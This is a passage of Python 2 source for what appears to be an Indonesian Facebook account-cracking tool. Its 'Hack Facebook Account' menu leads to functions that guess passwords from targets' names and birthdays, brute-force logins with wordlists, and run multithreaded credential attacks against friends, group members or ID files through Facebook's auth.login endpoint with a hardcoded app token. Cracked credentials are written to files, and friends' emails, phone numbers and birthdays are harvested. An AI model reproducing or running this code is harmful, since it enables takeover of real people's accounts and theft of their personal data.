time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
